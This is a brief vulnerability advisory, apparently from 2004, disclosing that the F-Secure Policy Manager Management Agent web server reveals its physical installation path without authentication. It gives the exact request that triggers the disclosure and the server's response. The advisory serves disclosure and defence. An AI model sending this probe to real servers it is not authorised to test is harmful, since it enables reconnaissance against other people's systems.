F-Secure Policy Manager - physical path disclosure
F-Secure Policy Manager - Management Agent - physical path disclosure
vulnerability
=====================================================================================
Version:
========
FSMSH Version 5.11.2810 - on Win32 (not tested on other platforms)
Vuln:
=====
A webserver is running on Port 80/tcp. Connecting to the port via a
webbrowser offers the
following link, available without authentication:
/fsms/fsmsh.dll?FSMSCommand=GetVersion
Following this link will give the Version Number of the application:
5.11.2810
However.... modifiying the link as follows:
/fsms/fsmsh.dll?
will give the following result, containing the physical path of the
f-secure installation:
FSMSH Version 5.11.2810
Started at: 04/12/07 20:18:48
Processed requests: 8780
Commdir path: C:\Programme\F-Secure\Management Server 5\CommDir
COMMDIR: C:\Programme\F-Secure\Management Server 5\CommDir found
C:\Programme\F-Secure\Management Server 5\CommDir\commdir.cfg found
Repository API initialized - status: OK
Vendor:
=======
www.f-secure.com
Informed by mail on 07.Dec.2004; Response at 08.Dec.; Will be fixed
anytime.
Discovered by:
==============
oliver karow
This document: http://www.oliverkarow.de/research/f-secure.txt